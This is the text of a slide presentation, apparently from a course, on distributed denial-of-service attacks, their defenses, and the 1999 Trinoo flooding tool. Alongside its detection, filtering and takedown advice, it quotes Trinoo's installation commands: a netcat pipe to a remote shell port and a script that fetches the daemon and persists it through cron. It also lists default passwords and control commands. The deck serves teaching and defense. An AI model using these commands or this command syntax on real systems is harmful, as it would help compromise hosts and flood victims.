dos attack ppt

1.1Operating System Concepts

An Introduction to DDoS

And the “Trinoo” Attack Tool

Acknowledgement: Ray Lam, Ivan Wong


Outline

Background on DDoS Attack mechanism Ways to defend

The attack tool – Trinoo Introduction Attack scenario Symptoms and defense Weaknesses and next evolution


Background on DDoS

Attack mechanism


Denial-Of-Service

Flooding-based Send packets to victims

Network resources System resources

Traditional DOS One attacker

Distributed DOS Countless attackers


Attack Mechanism

Direct Attack

Reflector Attack

R

A

V

TCP SYN, ICMP, UDP With R’s Address as source IP address.

TCP SYN-ACK, TCP RST, ICMP, UDP..


R

V

ATCP SYN, ICMP, UDP.. With V’s Address as source IP address.


Attack Architecture

V

A

Masters (handlers)

Agents (Daemons or Zombies)

TCP SYN, ICMP, UDP.. (the source IP addresses are usually spoofed)

Direct Attack

A

Masters (handlers)


Reflectors

VReflector Attack

TCP SYN, ICMP, UDP.. (with V’s address as the source IP addresses)



Attack Methods

Attack packets Reply packets

Smurf ICMP echo queries to broadcast address ICMP echo replies

SYN flooding TCP SYN packets TCP SYN ACK packets

RST flooding TCP packets to closed ports TCP RST packets

ICMP flooding ICMP queriesUDP packets to closed portsIP packets with low TTL

ICMP repliesPort unreachableTime exceeded

DNS reply flooding DNS queries (recursive) to DNS servers DNS replies


BackScatter Analysis (Moore et al.)

Measured DOS activity on the Internet.

TCP (94+ %) UDP (2 %) ICMP (2 %)

TCP attacks based mainly on SYN flooding


Background on DDoS

Ways to defend


Strategy

Three lines of defense: Attack prevention

- before the attack Attack detection and filtering

- during the attack Attack source traceback

- during and after the attack


Attack prevention

Protect hosts from installation of masters and agents by attackers

Scan hosts for symptoms of agents being installed

Monitor network traffic for known message exchanges among attackers, masters, agents


Attack prevention

Inadequate and hard to deploy Don’t-care users leave security holes ISP and enterprise networks do not

have incentives


Attack source traceback

Identify actual origin of packet Without relying on source IP of

packet 2 approaches

Routers record info of packets Routers send additional info of packets to

destination


Attack source traceback

Source traceback cannot stop ongoing DDoS attack Cannot trace origins behind

firewalls, NAT (network address translators)

More to do for reflector attack (attack packets from legitimate sources)

Useful in post-attack law enforcement


Attack detection and filtering

Detection Identify DDoS attack and attack

packets Filtering

Classify normal and attack packets Drop attack packets



Can be done in 4 places Victim’s network Victim’s ISP network Further upstream ISP network Attack source networks

Dispersed agents send packets to single victim

Like pouring packets from top of funnel



Victim

Attack sourcenetworks

Further upstreamISP networks

Victim’s ISP network

Victim’s network

Effectiveness of filtering

increases

Effectiveness of detection

increases



Detection Easy at victim’s network – large amount

of attack packets Difficult at individual agent’s network –

small amount of attack packets Filtering

Effective at agents’ networks – less likely to drop normal packets

Ineffective at victim’s network – more normal packets are dropped


D&F at agent’s network

Usually cannot detect DDoS attack

Can filter attack packets with address spoofed Attack packets in direct attacks Attack packets from agents to

reflectors in reflector attacks Ensuring all ISPs to install

ingress packet filtering is impossible


D&F at victim’s network

Detect DDoS attack Unusually high volume of incoming traffic

of certain packet types Degraded server and network

performance Filtering is ineffective

Attack and normal packets have same destination – victim’s IP and port

Attack packets have source IP spoofed or come from many different IPs

Attack and normal packets indistinguishable


D&F at victim’s upstream ISP

Often requested by victim to filter attack packets

Alert protocol Victim cannot receive ACK from ISP Requires strong authentication and

encryption Filtering ineffective ISP network may also be jammed


D&F at further upstream ISP

Backpressure approach Victim detects DDoS attack Upstream ISPs filter attack

packets


The attack tool – Trinoo

Introduction


Introduction

Discovered in August 1999 Daemons found on Solaris 2.x

systems Attack a system in University of

Minnesota Victim unusable for 2 days


Attack type

UDP flooding Default size of UDP packet: 1000

bytes malloc() buffer of this size and send

uninitialized content Default period of attack: 120 seconds Destination port: randomly chosen

from 0 – 65534



Attack scenario


Installation

1. Hack an account Acts as repository

Scanning tools, attack tools, Trinoo daemons, Trinoo maters, etc.

Requirements High bandwidth connection Large number of users Little administrative oversight


Installation

2. Compromise systems Look for vulnerable systems

Unpatched Sun Solaris and Linux

Remote buffer overflow exploitation Set up root account Open TCP ports

Keep a `friend list`


Installation

3. Install daemons Use “netcat” (“nc”) and “trin.sh”

netcat Network version of “cat”

trin.sh Shell script to set up daemons

./trin.sh | nc 128.aaa.167.217 1524 &

./trin.sh | nc 128.aaa.167.218 1524 &


Installation

trin.sh

echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"echo "echo rcp is done moving binary"

echo "chmod +x /usr/sbin/rpc.listen"

echo "echo launching trinoo"echo "/usr/sbin/rpc.listen"

echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"echo "crontab cron"echo "echo launched"echo "exit"


Architecture

Victim

Attacker

Masters (handlers)


Direct Attack


Communication ports

Monitor specific ports to detect presence of master, agent

Attacker Master Daemon

Port 27665

TCPUDP

UDP Port 27444

Port 31335


Password protection

Password used to prevent administrators or other hackers to take control

Encrypted password compiled into master and daemon using crypt()

Clear-text password is sent over network – session is not encrypted

Received password is encrypted and compared


Password protection

Default passwords “l44adsl” – trinoo daemon

password “gOrave” – trinoo master server

startup “betaalmostdone” – trinoo master

remote interface password “killme” – trinoo master password

to control “mdie” command


Login to master

Telnet to port 27665 of the host with master Enter password “betaalmostdone” Warn if others try to connect the master

[root@r2 root]# telnet r1 27665Trying 192.168.249.201...Connected to r1.router (192.168.249.201).Escape character is '^]'.betaalmostdonetrinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo>


Master and daemon

Communicate by UDP packets Command line format

arg1 password arg2

Default password is “l44adsl” When daemon starts, it sends

“HELLO” to master Master maintains list of daemon


Master commands

dos IP DoS the IP address specified “aaa l44adsl IP” sent to each

daemon mdos <ip1:ip2:ip3>

DoS the IPs simultaneously mtimer N

Set attack period to N seconds


Master commands

bcast List all daemons’ IP

mdie password Shutdown all daemons

killdead Invite all daemons to send

“HELLO” to master Delete all dead daemons from the

list


Daemon commands

Not directly used; only used by master to send commands to daemons

Consist of 3 letters Avoid exposing the commands by

using Unix command “strings” on the binary


Daemon commands

aaa password IP DoS specified IP

bbb password N Set attack period to N seconds

rsz password N Set attack packet size to N bytes



Symptoms and defense


Symptoms

Masters Crontab

Friend list … …-b

* * * * * /usr/sbin/rpc.listen

# ls -l ... ...-b -rw------- 1 root root 25 Sep 26 14:46 ... -rw------- 1 root root 50 Sep 26 14:30 ...-b


Symptoms

Masters (Con’t) Socket status

# netstat -a --inetActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:27665 *:* LISTEN . . .udp 0 0 *:31335 *:* . . .


Symptoms

Masters (Con’t) File status

# lsof | egrep ":31335|:27665"master 1292 root 3u inet 2460 UDP *:31335 master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)

# lsof -p 1292COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEmaster 1292 root cwd DIR 3,1 1024 14356 /tmp/...master 1292 root rtd DIR 3,1 1024 2 /master 1292 root txt REG 3,1 30492 14357 /tmp/.../mastermaster 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.somaster 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so


Symptoms

Daemons Socket status

# netstat -a --inetActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State . . .udp 0 0 *:1024 *:* udp 0 0 *:27444 *:* . . .


Symptoms

Daemons (Con’t) File status

# lsof | egrep ":27444"ns 1316 root 3u inet 2502 UDP *:27444

# lsof -p 1316COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEns 1316 root cwd DIR 3,1 1024 153694 /tmp/...ns 1316 root rtd DIR 3,1 1024 2 /ns 1316 root txt REG 3,1 6156 153711 /tmp/.../nsns 1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.sons 1316 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.sons 1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so


Defenses

Prevent root level compromise Patch systems Set up firewalls Monitor traffics

Block abused ports High numbered UDP ports Trade off

Also block normal programs using the same ports



Weaknesses and next evolution


Weaknesses

Single kind of attack UDP flooding Easily defended by single defense

tools Use IP as destination address

“Moving target defense” – victim changes IP to avoid attack


Weaknesses

Password, encrypted password, commands visible in binary images Use Unix command “strings” to obtain

- strings master- strings –n3 ns

Check if Trinoo found Crack the encrypted passwords


Weaknesses

Password travels in plain text in network Daemon password frequently sent in

master-to-daemon commands Get password by “ngrep”, “tcpdump”

which show UDP payload


Uproot a Trinoo network

Locate a daemon Use “strings” to obtain IPs of masters Contact sites with master installed Those sites check list of daemons

By inspecting file “…” or get master login password and use “bcast” command

Get “mdie” password Use “mdie” to shut down all daemons “mdie” periodically as daemons restarted by

crontab


Next evolution

Combination of several attack types SYN flood, UDP flood, ICMP flood… Higher chance of successful attack

Stronger encryption of embedded strings, passwords

Use encrypted communication channel

Communicate by protocol difficult to be detected or blocked, e.g. ICMP


References

R. Chang, “Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial,” Oct. 2002

D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed Denial of Service Attack Tool,” http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999

dos attack ppt

Documents

source ip addresses

unix command strings

attack source traceback

source ip address

normal packets

attack detection

reflector attack

attack prevention